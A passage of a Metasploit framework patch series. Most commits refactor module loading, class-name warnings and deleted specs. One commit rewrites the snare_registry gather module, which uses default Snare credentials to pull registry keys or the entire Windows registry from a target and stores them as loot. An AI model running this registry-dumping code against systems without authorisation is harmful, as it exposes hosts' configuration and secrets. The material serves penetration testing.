@@ -131,8 +126,6 @@ class Msf::Modules::Loader::Base reload ||= force || file_changed - metasploit_class = nil - module_content = read_module_content(parent_path, type, module_reference_name) if module_content.empty? @@ -140,6 +133,7 @@ class Msf::Modules::Loader::Base return false end + klass = nil try_eval_module = lambda { |namespace_module| # set the parent_path so that the module can be reloaded with #load_module namespace_module.parent_path = parent_path @@ -150,44 +144,21 @@ class Msf::Modules::Loader::Base rescue ::Interrupt raise rescue ::Exception => error - # Hide eval errors when the module version is not compatible - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - else - load_error(module_path, error) - end - - return false - end - - begin - namespace_module.version_compatible!(module_path, module_reference_name) - rescue Msf::Modules::VersionCompatibilityError => version_compatibility_error - load_error(module_path, version_compatibility_error) - - return false - end - - begin - metasploit_class = namespace_module.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error load_error(module_path, error) - return false end - unless usable?(metasploit_class) - ilog( - "Skipping module (#{module_reference_name} from #{module_path}) because is_usable returned false.", - 'core', - LEV_1 - ) - + if namespace_module.const_defined?('Metasploit3') || namespace_module.const_defined?('Metasploit4') + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Please change the module class name to Metasploit' + })) return false end + klass = namespace_module.const_get('Metasploit') + if reload ilog("Reloading #{type} module #{module_reference_name}. Ambiguous module warnings are safe to ignore", 'core', LEV_2) else @@ -206,7 +177,7 @@ class Msf::Modules::Loader::Base # Do some processing on the loaded module to get it into the right associations module_manager.on_module_load( - metasploit_class, + klass, type, module_reference_name, { @@ -432,8 +403,10 @@ class Msf::Modules::Loader::Base log_lines << "#{module_path} failed to load due to the following error:" log_lines << error.class.to_s log_lines << error.to_s - log_lines << "Call stack:" - log_lines += error.backtrace + if error.backtrace + log_lines << "Call stack:" + log_lines += error.backtrace + end log_message = log_lines.join("\n") elog(log_message) diff --git a/lib/msf/core/modules/metasploit_class_compatibility_error.rb b/lib/msf/core/modules/metasploit_class_compatibility_error.rb deleted file mode 100644 index ae829392cf..0000000000 --- a/lib/msf/core/modules/metasploit_class_compatibility_error.rb +++ /dev/null @@ -1,14 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#metasploit_class!} if it cannot the namespace_module does not have a constant -# with {Msf::Framework::Major} or lower as a number after 'Metasploit', which indicates a compatible Msf::Module. -class Msf::Modules::MetasploitClassCompatibilityError < Msf::Modules::Error - def initialize(attributes={}) - super_attributes = { - :causal_message => 'Missing compatible Metasploit class constant', - }.merge(attributes) - - super(super_attributes) - end -end \ No newline at end of file diff --git a/lib/msf/core/modules/namespace.rb b/lib/msf/core/modules/namespace.rb deleted file mode 100644 index fa65f5fa26..0000000000 --- a/lib/msf/core/modules/namespace.rb +++ /dev/null @@ -1,76 +0,0 @@ -# -*- coding: binary -*- -require 'metasploit/framework/api/version' -require 'metasploit/framework/core/version' - -# Concern for behavior that all namespace modules that wrap Msf::Modules must support like version checking and -# grabbing the version specific-Metasploit* class. -module Msf::Modules::Namespace - # Returns the Metasploit(3|2|1) class from the module_evalled content. - # - # @note The module content must be module_evalled into this namespace module before the return of - # {#metasploit_class} is valid. - # - # @return [Msf::Module] if a Metasploit(3|2|1) class exists in this module - # @return [nil] if such as class is not defined. - def metasploit_class - metasploit_class = nil - - ::Msf::Framework::Major.downto(1) do |major| - # Since we really only care about the deepest namespace, we don't - # need to look for parents' constants. However, the "inherit" - # parameter for const_defined? only exists after 1.9. If we ever - # drop 1.8 support, we can save a few cycles here by passing false - # here. - if const_defined?("Metasploit#{major}") - metasploit_class = const_get("Metasploit#{major}") - - break - end - end - - metasploit_class - end - - def metasploit_class!(module_path, module_reference_name) - metasploit_class = self.metasploit_class - - unless metasploit_class - raise Msf::Modules::MetasploitClassCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name - ) - end - - metasploit_class - end - - # Raises an error unless {Msf::Framework::VersionCore} and {Msf::Framework::VersionAPI} meet the minimum required - # versions defined in RequiredVersions in the module content. - # - # @note The module content must be module_evalled into this namespace module using module_eval_with_lexical_scope - # before calling {#version_compatible!} is valid. - # - # @param [String] module_path Path from where the module was read. - # @param [String] module_reference_name The canonical name for the module. - # @raise [Msf::Modules::VersionCompatibilityError] if RequiredVersion[0] > Msf::Framework::VersionCore or - # RequiredVersion[1] > Msf::Framework::VersionApi - # @return [void] - def version_compatible!(module_path, module_reference_name) - if const_defined?(:RequiredVersions) - required_versions = const_get(:RequiredVersions) - minimum_core_version = Gem::Version.new(required_versions[0].to_s) - minimum_api_version = Gem::Version.new(required_versions[1].to_s) - - if (minimum_core_version > Metasploit::Framework::Core::GEM_VERSION || - minimum_api_version > Metasploit::Framework::API::GEM_VERSION) - raise Msf::Modules::VersionCompatibilityError.new( - :module_path => module_path, - :module_reference_name => module_reference_name, - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - end - end -end - diff --git a/lib/msf/core/modules/version_compatibility_error.rb b/lib/msf/core/modules/version_compatibility_error.rb deleted file mode 100644 index fb52be3fc8..0000000000 --- a/lib/msf/core/modules/version_compatibility_error.rb +++ /dev/null @@ -1,52 +0,0 @@ -# -*- coding: binary -*- -require 'msf/core/modules/error' - -# Error raised by {Msf::Modules::Namespace#version_compatible!} on {Msf::Modules::Loader::Base#create_namespace_module} -# if the API or Core version does not meet the minimum requirements defined in the RequiredVersions constant in the -# {Msf::Modules::Loader::Base#read_module_content module content}. -class Msf::Modules::VersionCompatibilityError < Msf::Modules::Error - # @param [Hash{Symbol => Float}] attributes - # @option attributes [Float] :minimum_api_version The minimum {Msf::Framework::VersionAPI} as defined in - # RequiredVersions. - # @option attributes [Float] :minimum_core_version The minimum {Msf::Framework::VersionCore} as defined in - # RequiredVersions. - def initialize(attributes={}) - @minimum_api_version = attributes[:minimum_api_version] - @minimum_core_version = attributes[:minimum_core_version] - - message_parts = [] - message_parts << 'version check' - - if minimum_api_version or minimum_core_version - clause_parts = [] - - if minimum_api_version - clause_parts << "API >= #{minimum_api_version}" - end - - if minimum_core_version - clause_parts << "Core >= #{minimum_core_version}" - end - - clause = clause_parts.join(' and ') - message_parts << "(requires #{clause})" - end - - causal_message = message_parts.join(' ') - - super_attributes = { - :causal_message => causal_message - }.merge(attributes) - - super(super_attributes) - end - - # @return [Float] The minimum value of {Msf::Framework::VersionAPI} for the module to be compatible. - attr_reader :minimum_api_version - # @return [Float] The minimum value of {Msf::Framework::VersionCore} for the module to be compatible. - attr_reader :minimum_core_version - # @return [String] the path to the module that declared the RequiredVersions - attr_reader :module_path - # @return [String] the module reference name that declared the RequiredVersions - attr_reader :module_reference_name -end \ No newline at end of file diff --git a/modules/exploits/multi/http/joomla_http_header_rce.rb b/modules/exploits/multi/http/joomla_http_header_rce.rb index c047d6242c..d395288c87 100644 --- a/modules/exploits/multi/http/joomla_http_header_rce.rb +++ b/modules/exploits/multi/http/joomla_http_header_rce.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Joomla From 9bed78701db55170ae58fe3fe644fd66f3feafcb Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 28 Dec 2015 21:10:43 +0000 Subject: [PATCH 174/686] Replace module actions with REG_DUMP_* options --- modules/auxiliary/gather/snare_registry.rb | 81 ++++------------------ 1 file changed, 15 insertions(+), 66 deletions(-) diff --git a/modules/auxiliary/gather/snare_registry.rb b/modules/auxiliary/gather/snare_registry.rb index 78a9fcd514..5babbb9f56 100644 --- a/modules/auxiliary/gather/snare_registry.rb +++ b/modules/auxiliary/gather/snare_registry.rb @@ -29,16 +29,7 @@ class Metasploit4 < Msf::Auxiliary 'References' => [ [ 'URL', 'https://www.intersectalliance.com/wp-content/uploads/user_guides/Guide_to_Snare_for_Windows-4.2.pdf' ] - ], - 'Actions' => - [ - [ 'System Information', 'Description' => 'Retrieve information about the system' ], - [ 'Snare Information', 'Description' => 'Retrieve information about the Snare installation' ], - [ 'Dump Registry Key', 'Description' => 'Retrieve a specified registry key, including all sub-keys' ], - [ 'Dump Registry Hive', 'Description' => 'Retrieve a specified registry hive, including all sub-keys' ], - [ 'Dump Registry', 'Description' => 'Retrieve the entire Windows registry. (Note: this may take a while)' ] - ], - 'DefaultAction' => 'System Information' + ] )) register_options( @@ -46,25 +37,14 @@ class Metasploit4 < Msf::Auxiliary Opt::RPORT(6161), OptString.new('USERNAME', [ false, 'The username for Snare remote access', 'snare' ]), OptString.new('PASSWORD', [ false, 'The password for Snare remote access', '' ]), - OptString.new('REG_KEY', [ false, 'The registry key to retrieve', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]), - OptString.new('REG_HIVE', [ false, 'The registry hive to retrieve', 'HKLM' ]), + OptString.new('REG_DUMP_KEY', [ false, 'Retrieve this registry key and all sub-keys', 'HKLM\\HARDWARE\\DESCRIPTION\\System' ]), + OptBool.new('REG_DUMP_ALL', [false, 'Retrieve the entire Windows registry', false]), OptInt.new('TIMEOUT', [true, 'Timeout in seconds for downloading each registry key/hive', 300]) ], self.class) end def run - case action.name - when 'System Information' - dump_key('HKLM\\HARDWARE\\DESCRIPTION\\System') - when 'Snare Information' - dump_key('HKLM\\Software\\InterSect Alliance') - when 'Dump Registry Key' - dump_key(datastore['REG_KEY']) - when 'Dump Registry Hive' - dump_hive(datastore['REG_HIVE']) - when 'Dump Registry' - dump_all - end + datastore['REG_DUMP_ALL'] ? dump_all : dump_key(datastore['REG_DUMP_KEY']) end # @@ -76,17 +56,20 @@ class Metasploit4 < Msf::Auxiliary end hive = reg_key.split('\\').first key = reg_key.split('\\')[1..-1].join('\\\\') - if key.nil? || key.empty? || hive !~ /\A[A-Z0-9_]+\z/i + if hive !~ /\A[A-Z0-9_]+\z/i fail_with(Failure::BadConfig, "#{peer} - Please supply a valid key name") end - print_status("#{peer} - Retrieving registry key '#{hive}\\\\#{key}'...") + vars_get = { 'str_Base' => hive } + if key.eql?('') + print_status("#{peer} - Retrieving registry hive '#{hive}'...") + else + print_status("#{peer} - Retrieving registry key '#{hive}\\\\#{key}'...") + vars_get['str_SubKey'] = key + end res = send_request_cgi({ 'uri' => normalize_uri('RegDump'), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'vars_get' => { - 'str_Base' => hive, - 'str_SubKey' => key - } + 'vars_get' => vars_get }, datastore['TIMEOUT']) if !res fail_with(Failure::Unreachable, "#{peer} - Connection failed") @@ -102,7 +85,7 @@ class Metasploit4 < Msf::Auxiliary fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") end path = store_loot( - 'snare.registry.key', + 'snare.registry', 'text/plain', datastore['RHOST'], res.body, @@ -111,40 +94,6 @@ class Metasploit4 < Msf::Auxiliary print_good("File saved in: #{path}") end - # - # Retrieve the supplied registry hive - # - def dump_hive(hive) - if hive !~ /\A[A-Z0-9_]+\z/i - fail_with(Failure::BadConfig, "#{peer} - Please supply a valid hive name") - end - print_status("#{peer} - Retrieving registry hive '#{hive}' ...") - res = send_request_cgi({ - 'uri' => normalize_uri('RegDump'), - 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), - 'vars_get' => { 'str_Base' => hive } - }, datastore['TIMEOUT']) - if !res - fail_with(Failure::Unreachable, "#{peer} - Connection failed") - elsif res.code && res.code == 401 - fail_with(Failure::NoAccess, "#{peer} - Authentication failed") - elsif res.code && res.code == 404 - fail_with(Failure::NotVulnerable, "#{peer} - Dump Registry feature is unavailable") - elsif res.code && res.code == 200 && res.body && res.body =~ /\AKEY: / - print_good("#{peer} - Retrieved hive successfully (#{res.body.length} bytes)") - else - fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected reply (#{res.body.length} bytes)") - end - path = store_loot( - 'snare.registry.hive', - 'text/plain', - datastore['RHOST'], - res.body, - hive.gsub(/[^\w]/, '_').downcase - ) - print_good("File saved in: #{path}") - end - # # Retrieve list of registry hives # @@ -179,6 +128,6 @@ class Metasploit4 < Msf::Auxiliary print_error("#{peer} - Found no registry hives") return end - hives.each { |hive| dump_hive(hive) } + hives.each { |hive| dump_key(hive) } end end From 424e3468390cbcde463f3706088de3f482f62c9e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Mon, 28 Dec 2015 23:02:14 +0100 Subject: [PATCH 175/686] do not fail on old class name --- lib/msf/core/modules/loader/base.rb | 20 +++++++++++++++++--- 1 file changed, 17 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 617e449efa..851e2ec510 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -148,17 +148,31 @@ class Msf::Modules::Loader::Base return false end - if namespace_module.const_defined?('Metasploit3') || namespace_module.const_defined?('Metasploit4') + if namespace_module.const_defined?('Metasploit3') + klass = namespace_module.const_get('Metasploit3') load_error(module_path, Msf::Modules::Error.new({ :module_path => module_path, :module_reference_name => module_reference_name, :causal_message => 'Please change the module class name to Metasploit' })) + elsif namespace_module.const_defined?('Metasploit4') + klass = namespace_module.const_get('Metasploit4') + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Please change the module class name to Metasploit' + })) + elsif namespace_module.const_defined?('Metasploit') + klass = namespace_module.const_get('Metasploit') + else + load_error(module_path, Msf::Modules::Error.new({ + :module_path => module_path, + :module_reference_name => module_reference_name, + :causal_message => 'Invalid module (no Metasploit class or module name)' + })) return false end - klass = namespace_module.const_get('Metasploit') - if reload ilog("Reloading #{type} module #{module_reference_name}. Ambiguous module warnings are safe to ignore", 'core', LEV_2) else From 64bf5c980ed30dee2e20c492619e23aab2a162db Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 00:10:07 +0100 Subject: [PATCH 176/686] remove corresponding spec files --- ...tasploit_class_compatibility_error_spec.rb | 8 - spec/lib/msf/core/modules/namespace_spec.rb | 268 ------------------ .../version_compatibility_error_spec.rb | 63 ---- 3 files changed, 339 deletions(-) delete mode 100644 spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb delete mode 100644 spec/lib/msf/core/modules/namespace_spec.rb delete mode 100644 spec/lib/msf/core/modules/version_compatibility_error_spec.rb diff --git a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb b/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb deleted file mode 100644 index e4daf5f67c..0000000000 --- a/spec/lib/msf/core/modules/metasploit_class_compatibility_error_spec.rb +++ /dev/null @@ -1,8 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core/modules/metasploit_class_compatibility_error' - -RSpec.describe Msf::Modules::MetasploitClassCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' -end diff --git a/spec/lib/msf/core/modules/namespace_spec.rb b/spec/lib/msf/core/modules/namespace_spec.rb deleted file mode 100644 index ce8fa1588d..0000000000 --- a/spec/lib/msf/core/modules/namespace_spec.rb +++ /dev/null @@ -1,268 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -require 'msf/core' -require 'msf/core/modules/namespace' - -RSpec.describe Msf::Modules::Namespace do - let(:module_path) do - "parent/path/type_directory/#{module_reference_name}.rb" - end - - let(:module_reference_name) do - 'module/reference/name' - end - - subject do - mod = Module.new - mod.extend described_class - - mod - end - - context 'metasploit_class' do - before(:each) do - if major - subject.const_set("Metasploit#{major}", Class.new) - end - end - - context 'without Metasploit constant defined' do - let(:major) do - nil - end - - it 'should not be defined' do - metasploit_constants = subject.constants.select { |constant| - constant.to_s =~ /Metasploit/ - } - - expect(metasploit_constants).to be_empty - end - end - - context 'with Metasploit1 constant defined' do - let(:major) do - 1 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit1')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit2 constant defined' do - let(:major) do - 2 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit2')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit3 constant defined' do - let(:major) do - 3 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit3')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit4 constant defined' do - let(:major) do - 4 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit4')).to be_truthy - end - - it 'should return the class' do - expect(subject.metasploit_class).to be_a Class - end - end - - context 'with Metasploit5 constant defined' do - let(:major) do - 5 - end - - it 'should be defined' do - expect(subject.const_defined?('Metasploit5')).to be_truthy - end - - it 'should be newer than Msf::Framework::Major' do - expect(major).to be > Msf::Framework::Major - end - - it 'should return nil' do - expect(subject.metasploit_class).to be_nil - end - end - end - - context 'metasploit_class!' do - it 'should call metasploit_class' do - expect(subject).to receive(:metasploit_class).and_return(Class.new) - - subject.metasploit_class!(module_path, module_reference_name) - end - - context 'with metasploit_class' do - let(:metasploit_class) do - Class.new - end - - before(:each) do - allow(subject).to receive(:metasploit_class).and_return(metasploit_class) - end - - it 'should return the metasploit_class' do - expect(subject.metasploit_class!(module_path, module_reference_name)).to eq metasploit_class - end - end - - context 'without metasploit_class' do - before(:each) do - allow(subject).to receive(:metasploit_class) - end - - it 'should raise a Msf::Modules::MetasploitClassCompatibilityError' do - expect { - subject.metasploit_class!(module_path, module_reference_name) - }.to raise_error(Msf::Modules::MetasploitClassCompatibilityError) - end - - context 'the Msf::Modules::MetasploitClassCompatibilityError' do - it 'should include the module path' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_path) - end - - it 'should include the module reference name' do - error = nil - - begin - subject.metasploit_class!(module_path, module_reference_name) - rescue Msf::Modules::MetasploitClassCompatibilityError => error - end - - expect(error).not_to be_nil - expect(error.to_s).to include(module_reference_name) - end - end - end - end - - context 'version_compatible!' do - context 'without RequiredVersions' do - it 'should not be defined' do - expect(subject.const_defined?('RequiredVersions')).to be_falsey - end - - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - - context 'with RequiredVersions defined' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 1 - end - - before(:each) do - subject.const_set( - :RequiredVersions, - [ - minimum_core_version, - minimum_api_version - ] - ) - end - - context 'with minimum Core version' do - it 'is <= Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be <= Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'should not raise an error' do - expect { - subject.version_compatible!(module_path, module_reference_name) - }.to_not raise_error - end - end - end - - context 'without minimum Core version' do - let(:minimum_core_version) do - 5 - end - - it 'is > Metasploit::Framework::Core::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_core_version.to_s)).to be > Metasploit::Framework::Core::GEM_VERSION - end - - context 'without minimum API version' do - let(:minimum_api_version) do - 2 - end - - it 'is > Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be > Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - - context 'with minimum API version' do - it 'is <= Metasploit::Framework::API::GEM_VERSION when converted to Gem::Version' do - expect(Gem::Version.new(minimum_api_version.to_s)).to be <= Metasploit::Framework::API::GEM_VERSION - end - - it_should_behave_like 'Msf::Modules::VersionCompatibilityError' - end - end - end - end -end diff --git a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb b/spec/lib/msf/core/modules/version_compatibility_error_spec.rb deleted file mode 100644 index 8e732966a3..0000000000 --- a/spec/lib/msf/core/modules/version_compatibility_error_spec.rb +++ /dev/null @@ -1,63 +0,0 @@ -# -*- coding:binary -*- -require 'spec_helper' - -RSpec.describe Msf::Modules::VersionCompatibilityError do - it_should_behave_like 'Msf::Modules::Error subclass #initialize' do - let(:minimum_api_version) do - 1 - end - - let(:minimum_core_version) do - 2 - end - - it 'should say cause was version check' do - expect(subject.to_s).to match(/due to version check/) - end - - context 'with :minimum_api_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version - ) - end - - it 'should set minimum_api_version' do - expect(subject.minimum_api_version).to eq minimum_api_version - end - - it 'should include minimum_api_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version}\)/) - end - end - - context 'with :minimum_api_version and :minimum_core_version' do - subject do - described_class.new( - :minimum_api_version => minimum_api_version, - :minimum_core_version => minimum_core_version - ) - end - - it 'should include minimum_api_version and minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires API >= #{minimum_api_version} and Core >= #{minimum_core_version}\)/) - end - end - - context 'with :minimum_core_version' do - subject do - described_class.new( - :minimum_core_version => minimum_core_version - ) - end - - it 'should set minimum_core_version' do - expect(subject.minimum_core_version).to eq minimum_core_version - end - - it 'should include minimum_core_version in error' do - expect(subject.to_s).to match(/due to version check \(requires Core >= #{minimum_core_version}\)/) - end - end - end -end From 69cd39c1201a7c66ab61fffbc61dc658e3a249bc Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 10:37:09 +0100 Subject: [PATCH 177/686] show load warnings to the user --- lib/msf/core/module_manager.rb | 1 + lib/msf/core/module_manager/loading.rb | 2 +- lib/msf/core/modules/loader/base.rb | 29 ++++++++++++------- lib/msf/ui/console/command_dispatcher/core.rb | 7 +++++ lib/msf/ui/console/driver.rb | 7 +++++ 5 files changed, 35 insertions(+), 11 deletions(-) diff --git a/lib/msf/core/module_manager.rb b/lib/msf/core/module_manager.rb index c8ebc14c21..ed9740634a 100644 --- a/lib/msf/core/module_manager.rb +++ b/lib/msf/core/module_manager.rb @@ -120,6 +120,7 @@ module Msf self.module_info_by_path = {} self.enablement_by_type = {} self.module_load_error_by_path = {} + self.module_load_warnings = {} self.module_paths = [] self.module_set_by_type = {} diff --git a/lib/msf/core/module_manager/loading.rb b/lib/msf/core/module_manager/loading.rb index 415107d82d..c7bb4a0bb5 100644 --- a/lib/msf/core/module_manager/loading.rb +++ b/lib/msf/core/module_manager/loading.rb @@ -50,7 +50,7 @@ module Msf::ModuleManager::Loading changed end - attr_accessor :module_load_error_by_path + attr_accessor :module_load_error_by_path, :module_load_warnings # Called when a module is initially loaded such that it can be categorized # accordingly. diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 851e2ec510..290c2d353e 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -150,18 +150,10 @@ class Msf::Modules::Loader::Base if namespace_module.const_defined?('Metasploit3') klass = namespace_module.const_get('Metasploit3') - load_error(module_path, Msf::Modules::Error.new({ - :module_path => module_path, - :module_reference_name => module_reference_name, - :causal_message => 'Please change the module class name to Metasploit' - })) + load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') elsif namespace_module.const_defined?('Metasploit4') klass = namespace_module.const_get('Metasploit4') - load_error(module_path, Msf::Modules::Error.new({ - :module_path => module_path, - :module_reference_name => module_reference_name, - :causal_message => 'Please change the module class name to Metasploit' - })) + load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') elsif namespace_module.const_defined?('Metasploit') klass = namespace_module.const_get('Metasploit') else @@ -426,6 +418,23 @@ class Msf::Modules::Loader::Base elog(log_message) end + # Records the load warning to {Msf::ModuleManager::Loading#module_load_warnings} and the log. + # + # @param [String] module_path Path to the module as returned by {#module_path}. + # @param [String] Error message that caused the warning. + # @return [void] + # + # @see #module_path + def load_warning(module_path, error) + module_manager.module_load_warnings[module_path] = error.to_s + + log_lines = [] + log_lines << "#{module_path} generated a warning during load:" + log_lines << error.to_s + log_message = log_lines.join("\n") + wlog(log_message) + end + # @return [Msf::ModuleManager] The module manager for which this loader is loading modules. attr_reader :module_manager diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index be40468fa4..08851163db 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -223,6 +223,13 @@ class Core end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + cmd_banner() end diff --git a/lib/msf/ui/console/driver.rb b/lib/msf/ui/console/driver.rb index d2292ba6a9..5890ac111a 100644 --- a/lib/msf/ui/console/driver.rb +++ b/lib/msf/ui/console/driver.rb @@ -535,6 +535,13 @@ class Driver < Msf::Ui::Driver end end + if framework.modules.module_load_warnings.length > 0 + print_warning("The following modules were loaded with warnings:") + framework.modules.module_load_warnings.each do |path, error| + print_warning("\t#{path}: #{error}") + end + end + framework.events.on_ui_start(Msf::Framework::Revision) if $msf_spinner_thread From 2c2140127032df8fb090b3fb11ba37aa36b058e9 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 12:42:02 +0100 Subject: [PATCH 178/686] fix error when invalid classname eg "class Metasploit1 < .." --- lib/msf/core/modules/loader/base.rb | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index 290c2d353e..ae445cbb26 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -148,13 +148,13 @@ class Msf::Modules::Loader::Base return false end - if namespace_module.const_defined?('Metasploit3') + if namespace_module.const_defined?('Metasploit3', false) klass = namespace_module.const_get('Metasploit3') load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') - elsif namespace_module.const_defined?('Metasploit4') + elsif namespace_module.const_defined?('Metasploit4', false) klass = namespace_module.const_get('Metasploit4') load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') - elsif namespace_module.const_defined?('Metasploit') + elsif namespace_module.const_defined?('Metasploit', false) klass = namespace_module.const_get('Metasploit') else load_error(module_path, Msf::Modules::Error.new({ From bfe02d854cef08b1b33b09ca2316f27c234718cd Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Dec 2015 16:05:29 +0100 Subject: [PATCH 179/686] some slight changes --- lib/msf/core/modules/loader/base.rb | 31 +++++++++++++---------------- 1 file changed, 14 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/modules/loader/base.rb b/lib/msf/core/modules/loader/base.rb index ae445cbb26..13992d27c0 100644 --- a/lib/msf/core/modules/loader/base.rb +++ b/lib/msf/core/modules/loader/base.rb @@ -98,12 +98,9 @@ class Msf::Modules::Loader::Base # @option options [Boolean] :reload (false) whether this is a reload. # # @return [false] if :force is false and parent_path has not changed. - # @return [false] if exception encountered while parsing module - # content - # @return [false] if the module is incompatible with the Core or API - # version. - # @return [false] if the module does not implement a Metasploit(\d+) - # class. + # @return [false] if exception encountered while parsing module content + # @return [false] if the module is incompatible with the Core or API version. + # @return [false] if the module does not implement a Metasploit class. # @return [false] if the module's is_usable method returns false. # @return [true] if all those condition pass and the module is # successfully loaded. @@ -149,13 +146,13 @@ class Msf::Modules::Loader::Base end if namespace_module.const_defined?('Metasploit3', false) - klass = namespace_module.const_get('Metasploit3') + klass = namespace_module.const_get('Metasploit3', false) load_warning(module_path, 'Please change the modules class name from Metasploit3 to Metasploit') elsif namespace_module.const_defined?('Metasploit4', false) - klass = namespace_module.const_get('Metasploit4') + klass = namespace_module.const_get('Metasploit4', false) load_warning(module_path, 'Please change the modules class name from Metasploit4 to Metasploit') elsif namespace_module.const_defined?('Metasploit', false) - klass = namespace_module.const_get('Metasploit') + klass = namespace_module.const_get('Metasploit', false) else load_error(module_path, Msf::Modules::Error.new({ :module_path => module_path, @@ -316,9 +313,9 @@ class Msf::Modules::Loader::Base protected - # Returns a nested module to wrap the Metasploit(1|2|3) class so that it doesn't overwrite other (metasploit) - # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when - # searching constants from inside the Metasploit(1|2|3) class. + # Returns a nested module to wrap the Metasploit class so that it doesn't overwrite other (metasploit) + # module's classes. The wrapper module must be named so that active_support's autoloading code doesn't break when + # searching constants from inside the Metasploit class. # # @param namespace_module_names [Array] # {NAMESPACE_MODULE_NAMES} + @@ -328,7 +325,7 @@ class Msf::Modules::Loader::Base # @see NAMESPACE_MODULE_CONTENT def create_namespace_module(namespace_module_names) # In order to have constants defined in Msf resolve without the Msf qualifier in the module_content, the - # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with + # Module.nesting must resolve for the entire nesting. Module.nesting is strictly lexical, and can't be faked with # module_eval(&block). (There's actually code in ruby's implementation to stop module_eval from being added to # Module.nesting when using the block syntax.) All this means is the modules have to be declared as a string that # gets module_eval'd. @@ -451,7 +448,7 @@ class Msf::Modules::Loader::Base raise ::NotImplementedError end - # Returns whether the path could refer to a module. The path would still need to be loaded in order to check if it + # 